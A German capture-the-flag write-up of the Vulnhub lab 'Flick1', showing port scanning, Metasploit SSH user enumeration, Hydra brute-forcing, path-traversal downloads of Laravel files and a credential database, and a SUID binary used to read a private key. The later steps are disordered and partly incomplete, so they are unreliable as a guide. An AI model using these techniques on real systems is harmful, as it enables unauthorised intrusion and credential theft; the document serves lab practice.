Flick1 - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
ssh
msfconsole
cat
echo
hydra
curl
nc
docker
ln
rm

Inhaltsverzeichnis

Reconnaissance

In diesem Abschnitt führen wir die ersten Schritte der Aufklärung durch, um Informationen über das Zielsystem zu sammeln. Dies ist entscheidend, um potenzielle Angriffsvektoren zu identifizieren.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.125 flick1.vln

Die /etc/hosts-Datei ordnet die IP-Adresse dem Hostnamen "flick1.vln" zu.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 22:32 CEST
Nmap scan report for flick1.vln (192.168.2.125)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE   VERSION
22/tcp   open  ssh       OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 04:d0:8d:4d:ee:87:30:e7:60:82:63:d3:a8:6e:4b:ac (DSA)
|   2048 64:ec:a9:9b:0b:c0:11:d4:08:63:cf:83:e1:db:23:9a (RSA)
|_  256 2d:32:93:ce:0e:54:3f:84:ee:01:c7:c0:bb:68:e2:02 (ECDSA)
8881/tcp open  galaxy4d?
| fingerprint-strings:
|   DNSStatusRequestTCP, GenericLines, NULL, RPCCheck:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|   DNSVersionBindReqTCP:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|     version
|     bind
|   FourhFourRequest:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|     /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|   GetRequest:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|     HTTP/1.0
|   HTTPptions:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|     OPTIONS / HTTP/1.0
|   RTSPRequest:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|_    OPTIONS / RTSP/1.0
MAC Address: 08:00:27:53:30:62 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

Nmap Scan zeigt das Port 22(SSH) und 8881 offen sind. Auf port 8881 gibt es ein Admin Server der ein Passwort haben möchte.

Initial Access

In diesem Abschnitt versuchen wir, uns initialen Zugriff auf das System zu verschaffen.

┌──(root㉿CCat)-[~]
└─# ssh root@192.168.2.125 
The authenticity of host '192.168.2.125 (192.168.2.125)' can't be established.
ECDSA key fingerprint is SHA256:gFkTDTD/D7ndkanMRwJI92zYuzltDSkS7E3sPlpPk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.125' (ECDSA) to the list of known hosts.

\x56\x6d\x30\x77\x64\x32\x51\x79\x55\x58\x6c\x56\x57\x47\x78\x57\x56\x30\x64\x34
\x56\x31\x59\x77\x5a\x44\x52\x57\x4d\x56\x6c\x33\x57\x6b\x52\x53\x57\x46\x4a\x74
\x65\x46\x5a\x56\x4d\x6a\x41\x31\x56\x6a\x41\x78\x56\x32\x4a\x45\x54\x6c\x68\x68
.o88o. oooo   o8o            oooo
888 `" `888   `"'            888
o888oo   888  oooo   .ooooo.   888  oooo
888     888  `888  d88' `"Y8  888 .8P'
888     888   888  888        888888.
888     888   888  888   .o8  888 `88b.
o888o   o888o o888o `Y8bod8P' o888o o888o

Beim root login gibt es ein ascii Banner und irgendwas mit hex base64

https://cyberchef.org/#recipe=From_Hex('Auto')From_Base64
tabupJievas8Knoj

Die Hex daten in cyberchef und wir bekommen ein passwort.

┌──(root㉿CCat)-[~]
└─# msfconsole -q
search ssh_enum

Wir benutzen metasploit um ssh username zu enumerieren.

use 0
set rhosts 192.168.2.125
set rport 22
set user_file /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
run 
[*] 192.168.2.125:22 - SSH - Using malformed packet technique
[*] 192.168.2.125:22 - SSH - Checking for false positives
[*] 192.168.2.125:22 - SSH - Starting scan
[+] 192.168.2.125:22 - SSH - User 'mail' found
[+] 192.168.2.125:22 - SSH - User 'root' found
[+] 192.168.2.125:22 - SSH - User 'news' found
[+] 192.168.2.125:22 - SSH - User 'robin' found
[+] 192.168.2.125:22 - SSH - User 'dean' found
[+] 192.168.2.125:22 - SSH - User 'man' found
[+] 192.168.2.125:22 - SSH - User 'bin' found
[+] 192.168.2.125:22 - SSH - User 'games' found
[+] 192.168.2.125:22 - SSH - User 'nobody' found
[+] 192.168.2.125:22 - SSH - User 'backup' found
[+] 192.168.2.125:22 - SSH - User 'daemon' found
[+] 192.168.2.125:22 - SSH - User 'proxy' found
[+] 192.168.2.125:22 - SSH - User 'list' found
[+] 192.168.2.125:22 - SSH - User 'sys' found

Wir haben die Benuternamen erhalten mit metasploit

cat namen.txt
robin root dean nobody

namen txt um die Benuternamen zu speichern.

nc -vv 192.168.2.125 8881 
flick1.vln [192.168.2.125] 8881 (?) open
Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
tabupJievas8Knoj 
K: tabupJievas8Knoj

Accepted! The door should be open now :poolparty:

mit dem passwort sollte sich die Tür öffnen

echo 'poolparty' > wort
echo ':poolparty' >> wort

ein neues passwort für hydra

hydra -L namen.txt -P wort ssh://flick1.vln -t 64 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these * ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-05 23:15:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:5/p:2), ~1 try per task
[DATA] attacking ssh://flick1.vln:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-05 23:15:28

hydra wird genutzt aber die ausgabe gibt nix her

hosts eintrag
192.168.2.125 flick1.vln poolparty.flick.vln
curl http://poolparty.flick.vln 
Flick-a-Photo
href="http://poolparty.flick.vln/login/login">Login to add a Photo

poolparty ist die webseite wo man sich Anmelden kann, weist daraufhin.

curl http://poolparty.flick.vln/image 
Index of /image
[IC]	Name	Last modified	Size	Description
[DIR]	db/ 	07-Jul-2014 09:20 	-
[DIR]	scripts/ 	23-Apr-2014 08:00 	-
[DIR]	web/ 	07-Jul-2014 09:20 	-

ein image Ordner

hier ist ein jwt tool
https://jwt.io/ 
{
  "iv": "2v5bYn4cGKz5Ly/ZsaiTjFHy8uwC9wGU5zc59hjliHM=",
  "value": "SC9dW28HGt1ClkCZ/ZyaHa611EaFbYTVxYjdTTDcHJbHhDZZYod5WB11jEaTQDXERauSzDKGVw72chsTvAg",
  "mac": "aa51e99472eb83232423c0dc9048d052e37c358d3181cb3e7b0209c6876b346f"
}

jwt daten von webseite

Hydra
hydra -l demo -P /usr/share/wordlists/rockyou.txt flick1.vln http-post-form "/login/login:username=^USER^&password=^PASS^:Your username/password combination was incorrect" -t 64 
[80][http-post-form] host: flick1.vln   login: demo   password: demo123

es wird ein demo passwort gefunden

URL 
href="http://192.168.2.125/members/upload" Upload a photo
href="http://192.168.2.125/image/view/9C9kN5EloNXF

Upload seite ,

Privilege Escalation

In diesem Abschnitt versuchen wir, unsere Privilegien auf dem System zu erhöhen, um Root-Zugriff zu erlangen.

Burpsuite 
GET /image/download?filename=./index.php HTTP/1.1
Host: 192.168.2.125
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.125/
Cookie: laravel_session=eyJpdiI6IlpQaW50a....
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Burp request mit lokale Datei einfügen. 

HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 22:10:38 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Disposition: attachment; filename="image.jpg"
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: laravel_session=eyJpdiI6Im1UcytYzlnQUxwbXlLZm94UdkeUlcL2t5Ukt5NVAyK1NhekJuM0M....
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 1586

 Laravel - A PHP Framework For Web Artisans
  Register The Auto Loader
|--
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
 

require __DIR__.'/../bootstrap/autoload.php';

wir konnen jetzt code lesen

Dateien
GET /image/download?filename=..././composer.json HTTP/1.1 
{
	"name": "laravel/laravel",
	"description": "The Laravel Framework.",
	"keywords": ["framework", "laravel"],
	"license": "MIT",
	"require": {
		"laravel/framework": "4.1.*"
	},
	"autoload": {
		"classmap": [
			"app/commands",
			"app/controllers",
			"app/models",
			"app/database/migrations",
			"app/database/seeds",
			"app/tests/TestCase.php"
		]
	},
	"scripts": {
		"post-install-cmd": [
			"php artisan clear-compiled",
			"php artisan optimize"
		],
		"post-update-cmd": [
			"php artisan clear-compiled",
			"php artisan optimize"
		],
		"post-create-project-cmd": [
			"php artisan key:generate"
		]
	},
	"config": {
		"preferred-install": "dist"
	},
	"minimum-stability": "stable"
}
Dateien
GET /image/download?filename=..././app/routes.php HTTP/1.1 
Routeget('/', 'HomeController@showIndex');

Routecontroller('login', 'SessionController');
Routecontroller('members', 'UploadController');
Routecontroller('image', 'ViewController');
Dateien
GET /image/download?filename=..././app/controllers/SessionController.php HTTP/1.1 
 Routeget('/', 'HomeController@showWelcome');
	 
		// Haha :D
		if (strpos(Inputget('username'), "'") ! false)
			return Redirectto('login/login')
				->withErrors("You have an error in your SQL syntax; check the manual that corresponds to your
                                   MySQL server version for the right syntax to use near '' AND user.password=' at line 1");

		// Actual auth attempt
		if (Authattempt(array('username'=>Inputget('username'), 'password'=>Inputget('password')))) {
			return Redirectto('/')->with('message', 'You are now logged in!');
		} else {
			return Redirectto('login/login')
				->withErrors('Your username/password combination was incorrect')
				->withInput();
		}
	}

	public function getLogout()
	{
		Authlogout();
		return Redirectaction('HomeController@showIndex')
			->with('success', 'Successfully signed out');
	}

}

Initial Access

Sql Injection

Privilege Escalation

In diesem Abschnitt versuchen wir, unsere Privilegien auf dem System zu erhöhen, um Root-Zugriff zu erlangen.

GET /image/download?filename=..././app/database/production.sqlite HTTP/1.1 
 This file contains an SQLite 2.1 database
old_users (
 username text,
 password text
)
xdIIpaulnejEvibKugEdof0KebinAw6TogsacPayarkctIasejbon7Ni7Grocmyalkukvi --> Jrobin
JoofimwEakpalv4Jijyiat5GloonTojatticEirracksIg4yijovyirtAwUjad1
scujittyukIjwip0zicjoocAnIltAsh4Vuer4osDidsaiWipkDunipownIrtb5
FumKivcenfodErk0Chezauggyokyait5fojEpCayclEcyaj2heTwef0lNiphAnA

wir schauen uns die Daten an der sqlite datenbank.

es wird die ssh connection mit dem user dean erzeugt mit den befehl 
ssh dean@192.168.2.125

Password: FumKivcenfodErk0Chezauggyokyait5fojEpCayclEcyaj2heTwef0lNiphAnA

jetzt sind wir drinnnen. 

.o88o. oooo   o8o            oooo
888 `" `888   `"'            888
o888oo   888  oooo   .ooooo.   888  oooo
888     888  `888  d88' `"Y8  888 .8P'
888     888   888  888        888888.
888     888   888  888   .o8  888 `88b.
o88o   o88o o888o `Y8bod8P' o888o o888o

banner von system login 

dean@flick$ sudo -l

Matching Defaults entries for robin on this host:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User robin may run the following commands on this host:
    (root) NPASSWD: /opt/start_apache/restart.sh

sudo rechte für user robin 

dean@flick$ find / -type f -perm -4000 -ls 2>/dev/null
#7d10f3 12 -rwsr-xr-x 1 robin robin 8987 Aug 4 2014 /home/dean/read_docker

wir finden das bekannte tool

/home/robin/.ssh hier sollte die id rsa sein . wir erzeugen das tool zum auslesen
./read_docker /home/robin/.ssh/id_rsa 
-----BEGIN RSA PRIVATE KEY-----
MIIG4QIBAAKCAYEA03WmkCrIu0h33uI9p7jU1O81O7v50e7U54R6aM2TjFhB4p
.........................................................................
.........................................................................
-----END RSA PRIVATE KEY-----
erfolgreich gelesen dann versuchen einzuloggen
ssh robin@flick-i /home/robin/.ssh/id_rsa
Hier kommt der code der nicht komplett war. was noch fehlt docker

Privilege Escalation

in ordner ist eine txt datei . 53ca1c96115a7c156b14306b81df8f34e8a4bf8933cb687bd9334616f475dcbc
ls-lh/root

hier befindet sich die flag

/realflag.txt cat/realflag.txt Congrats! You have completed 'flick'! I hope you have enjoyed doing it as much as I did creating it :) ciao for now! @leonjza Privilege Escalation erfolgreich

Flags

Congrats! You have completed 'flick'! I hope you have enjoyed doing it as much as I did creating it :) ciao for now! @leonjza